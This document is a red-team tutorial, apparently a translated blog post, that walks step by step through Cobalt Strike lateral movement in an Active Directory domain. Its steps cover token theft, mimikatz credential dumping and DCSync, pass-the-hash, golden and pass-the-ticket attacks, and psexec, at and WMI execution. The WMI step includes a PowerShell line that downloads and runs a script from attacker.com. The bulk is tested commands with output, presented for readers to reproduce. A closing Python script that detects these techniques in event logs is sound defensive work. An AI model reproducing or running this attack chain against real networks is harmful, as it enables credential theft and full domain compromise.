
## 1. Overview of Lateral Movement with Cobalt Strike

When you land a Beacon session running as an ordinary domain user, the real challenge is only beginning. I have seen far too many newcomers get stuck at this step during a penetration test, unsure how to expand their foothold. Lateral movement is like a game of dominoes: find the key node, give it a gentle push, and the whole domain controller falls over.

The core of lateral movement is the flow of credentials. Imagine a burglar who has obtained a building's access card and then tries it on every apartment door. In an AD domain we work through the following barriers in turn:

- Token theft: like cloning someone else's access card
- Pass-the-hash: equivalent to breaking the access system's password algorithm
- Kerberos tickets: obtaining the master pass issued by building management

The most satisfying moment in the field is watching host icons turn from grey to red one after another on the Cobalt Strike map. Below I will walk you through the entire attack chain using real cases; every command has been tested, and you can reproduce it by following along.

## 2. From Token Theft to Privilege Escalation

### 2.1 Token Theft in Detail

Last week I ran into a typical scenario: a phishing email gave me a user-level Beacon on a Windows 10 host, and it turned out that user was also a local administrator on the domain's file server. In that situation token theft is the best way in.

The full procedure:

```
# List the current processes
beacon> ps
 PID   PPID  Name     Arch  Session  User
 ---   ----  ----     ----  -------  ----
 4000  792   cmd.exe  x64   1        TEAMSSIX\Administrator

# Steal the target process's token
beacon> steal_token 4000
[*] Tasked beacon to steal token from PID 4000
[+] host called home, sent: 132 bytes

# Verify the current identity
beacon> getuid
[*] You are TEAMSSIX\Administrator (admin)
```

Here is a pitfall I have hit three times: tokens from 32-bit and 64-bit processes are not interchangeable. If the target process is 32-bit and the Beacon is 64-bit, you first need to run migrate to move into a 32-bit process.

### 2.2 Manually Creating Tokens

When no high-privilege token can be found in memory, you can create one by hand:

```
# Create a new token
beacon> make_token TEAMSSIX\Admin Admin123
[*] Tasked beacon to create a token for TEAMSSIX\Admin
[+] host called home, sent: 156 bytes

# Spawn a new session
beacon> spawnas TEAMSSIX\Admin Admin123
[*] Tasked beacon to spawn TEAMSSIX\Admin as TEAMSSIX\Admin
[+] host called home, sent: 156 bytes
```

In testing I found that on Windows Server 2016 and later, tokens created with make_token sometimes cannot access network shares. In that case, spawning a new session with spawnas is more reliable.
## 3. The Art of Pass-the-Hash

### 3.1 Three Ways to Extract Hashes

Once you have local administrator rights, the first thing to do is grab hashes. My three standard moves:

Dump memory directly:

```
beacon> mimikatz sekurlsa::logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 300556 bytes
[+] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Interactive from 1
User Name         : Admin
Domain            : TEAMSSIX
SID               : S-1-5-21-1397491491-3740932367-1060284298-500
        msv :
         [00000003] Primary
         * Username : Admin
         * Domain   : TEAMSSIX
         * NTLM     : d69a9d8eeee7621bacdf9d1d71ef1e06
```

Export the registry hives and parse them:

```
beacon> reg save HKLM\SYSTEM system.hiv
beacon> reg save HKLM\SAM sam.hiv
beacon> mimikatz lsadump::sam /system:system.hiv /sam:sam.hiv
```

DCSync (requires domain admin rights):

```
beacon> mimikatz lsadump::dcsync /domain:teamssix.com /user:krbtgt
```

### 3.2 Pass-the-Hash in Practice

With an NTLM hash in hand, you can start playing with PTH (Pass-the-Hash):

```
beacon> pth TEAMSSIX\Admin d69a9d8eeee7621bacdf9d1d71ef1e06
[*] Tasked beacon to run mimikatz's sekurlsa::pth command
[+] host called home, sent: 300556 bytes
[+] received output:
user    : Admin
domain  : TEAMSSIX
program : cmd.exe
impers. : no
NTLM    : d69a9d8eeee7621bacdf9d1d71ef1e06
```

One detail here: since Windows 10 1809, Microsoft has restricted pass-the-hash for local accounts. PTH with domain accounts still works, which is why we prioritise obtaining domain account hashes.
## 4. Kerberos Ticket Attacks Explained

### 4.1 Forging a Golden Ticket

Once you have the krbtgt hash, the whole domain is your playground. Forging a golden ticket requires:

- the domain name: teamssix.com
- the domain SID: S-1-5-21-1397491491-3740932367-1060284298
- the NTLM hash of the krbtgt account

```
beacon> mimikatz kerberos::golden /user:Administrator /domain:teamssix.com /sid:S-1-5-21-1397491491-3740932367-1060284298 /krbtgt:d69a9d8eeee7621bacdf9d1d71ef1e06 /ptt
[*] Tasked beacon to run mimikatz's kerberos::golden command
[+] host called home, sent: 300556 bytes
[+] received output:
Golden ticket for 'Administrator @ teamssix.com' successfully submitted for current session
```

Verify that the ticket works:

```
beacon> shell dir \\dc.teamssix.com\c$
[*] Tasked beacon to run: dir \\dc.teamssix.com\c$
[+] host called home, sent: 56 bytes
[+] received output:
 Volume in drive \\dc.teamssix.com\c$ is Windows
```

### 4.2 Pass-the-Ticket in Practice

Sometimes we need to move a ticket to another machine. Export the tickets from the current session:

```
beacon> mimikatz kerberos::list /export
[*] Tasked beacon to run mimikatz's kerberos::list command
[+] host called home, sent: 300556 bytes
[+] received output:

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 2023/8/1 10:00:00 ; 2023/8/1 20:00:00 ; 2023/8/8 10:00:00
   Server Name       : krbtgt/TEAMSSIX.COM @ TEAMSSIX.COM
   Client Name       : Administrator @ TEAMSSIX.COM
   Flags 40e00000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
   * Saved to file     : 0-40e00000-Administrator@krbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi
```

Inject the ticket on the target host:

```
beacon> kerberos_ticket_use /path/to/0-40e00000-Administrator@krbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi
[*] Tasked beacon to use ticket at /path/to/0-40e00000-Administrator@krbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi
[+] host called home, sent: 2048 bytes
```
## 5. Three Advanced Lateral Movement Techniques

### 5.1 Making Good Use of the SMB Beacon

Traditional lateral movement means uploading a file to disk, where AV can easily catch it. With an SMB Beacon the whole process can be done without files:

```
# Generate an SMB Beacon
Attacks -> Packages -> Windows Executable(S) -> [√] SMB Beacon

# Create the service on the target host
beacon> psexec win-server-2008 smb
[*] Tasked beacon to spawn win-server-2008 via Service Control Manager (\\win-server-2008\ADMIN$)
[+] host called home, sent: 300556 bytes
[+] established link to child beacon: 192.168.1.15
```

The SMB Beacon communicates over named pipes, and the entire payload runs in memory. In a recent red team engagement I used this method to get past detection by a top-tier EDR.

### 5.2 Precision Strikes with Scheduled Tasks

When you need exact control over execution time, scheduled tasks are the obvious choice:

```
# Get the target system's time
beacon> shell net time \\win-server-2012
[*] Tasked beacon to run: net time \\win-server-2012
[+] host called home, sent: 56 bytes
[+] received output:
Current time at \\win-server-2012 is 8/1/2023 3:45:12 PM

# Create the scheduled task
beacon> shell at \\win-server-2012 15:50 C:\Windows\Temp\payload.exe
[*] Tasked beacon to run: at \\win-server-2012 15:50 C:\Windows\Temp\payload.exe
[+] host called home, sent: 92 bytes
[+] received output:
Added a new job with job ID = 1
```

### 5.3 Fileless Attacks via WMI

The stealthiest approach is WMI, which does not even create a service:

```
beacon> wmi win-server-2016 powershell -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
[*] Tasked beacon to run command on win-server-2016 via WMI
[+] host called home, sent: 300556 bytes
[+] established link to child beacon: 192.168.1.20
```

Remember to tick "Bind to local port only" in the Cobalt Strike listener configuration so that the WMI connection is not blocked by the firewall.
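Each of the three techniques in this section leaves a distinct host artifact on the target: psexec installs a service (System event 7045) whose binary is dropped through the ADMIN$ share that the page's own output names, at.exe creates a task (Security event 4698, task names of the form \AtN) pointing at the dropped executable, and WMI execution spawns the command as a child of WmiPrvSE.exe (Sysmon event 1). The triage script below correlates those three signals over constructed sample events. It is an added example and not code from the original post or from Cobalt Strike; the events are flattened key=value text, and the "random seven-character service name" heuristic is an assumption about default tooling behaviour rather than a fact stated on the page.

```python
import re
from typing import Dict, List, Optional

# Constructed sample events (not real telemetry) flattened to key=value lines:
# System 7045 (service installed), Security 4698 (scheduled task created),
# Sysmon 1 (process creation). Each pair has one benign and one suspicious entry.
SAMPLE_EVENTS = r"""
EventID=7045 ServiceName=WinDefend ImagePath=C:\Program Files\Windows Defender\MsMpEng.exe StartType=auto start
EventID=7045 ServiceName=a3f9e1b ImagePath=\\127.0.0.1\ADMIN$\a3f9e1b.exe StartType=demand start
EventID=4698 SubjectUserName=svc_patch TaskName=\Microsoft\Windows\Defrag\ScheduledDefrag Command=%windir%\system32\defrag.exe
EventID=4698 SubjectUserName=Admin TaskName=\At1 Command=C:\Windows\Temp\payload.exe
EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe User=TEAMSSIX\Admin
EventID=1 Image=C:\Windows\System32\svchost.exe ParentImage=C:\Windows\System32\services.exe User=NT AUTHORITY\SYSTEM
"""

KV = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")          # values may contain spaces
REMOTE_ADMIN_SHARE = re.compile(r"\\ADMIN\$\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\Temp\\", re.IGNORECASE)
RANDOM_SERVICE_NAME = re.compile(r"^[a-z0-9]{7}$")   # assumption: default-tooling heuristic, tune locally
AT_TASK_NAME = re.compile(r"^\\At\d+$")              # legacy at.exe names its jobs \At1, \At2, ...
WMI_HOST = "wmiprvse.exe"
# Assumption: interpreters whose parent should never be the WMI provider host.
SHELLS = {"powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe"}


def parse_event(line: str) -> Dict[str, str]:
    return {m.group(1): m.group(2) for m in KV.finditer(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_service_install(ev: Dict[str, str]) -> Optional[str]:
    """7045: service binary on the ADMIN$ share, in a Temp directory, or with a random-looking name."""
    if ev.get("EventID") != "7045":
        return None
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    reasons = []
    if REMOTE_ADMIN_SHARE.search(path):
        reasons.append("binary served from ADMIN$ share")
    if TEMP_DIR.search(path):
        reasons.append("binary in a Temp directory")
    if RANDOM_SERVICE_NAME.match(name):
        reasons.append("random-looking 7-char service name")
    return f"7045 service {name!r} -> {path}: " + "; ".join(reasons) if reasons else None


def check_scheduled_task(ev: Dict[str, str]) -> Optional[str]:
    """4698: task created by legacy at.exe, or task command pointing into a Temp directory."""
    if ev.get("EventID") != "4698":
        return None
    task, cmd = ev.get("TaskName", ""), ev.get("Command", "")
    reasons = []
    if AT_TASK_NAME.match(task):
        reasons.append("created with legacy at.exe")
    if TEMP_DIR.search(cmd):
        reasons.append("runs a binary from a Temp directory")
    return f"4698 task {task} -> {cmd}: " + "; ".join(reasons) if reasons else None


def check_wmi_spawn(ev: Dict[str, str]) -> Optional[str]:
    """Sysmon 1: an interpreter whose parent is WmiPrvSE.exe, the signature of remote WMI execution."""
    if ev.get("EventID") != "1":
        return None
    if basename(ev.get("ParentImage", "")) == WMI_HOST and basename(ev.get("Image", "")) in SHELLS:
        return (f"Sysmon 1: {basename(ev['Image'])} spawned by WmiPrvSE.exe as {ev.get('User')}: "
                "remote WMI execution pattern")
    return None


def triage(text: str) -> List[str]:
    """Apply all three lateral-movement rules to every event line; return alerts in order."""
    alerts: List[str] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in (check_service_install, check_scheduled_task, check_wmi_spawn):
            msg = rule(ev)
            if msg:
                alerts.append(msg)
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

On the sample this produces exactly one alert per technique. The 7045 rule shows why the "fileless" description of the SMB Beacon path in section 5.1 only holds for the payload's execution: the service binary itself is still written to the target through ADMIN$ and recorded by the Service Control Manager, so auditing service installations on servers remains one of the cheapest controls against this class of movement.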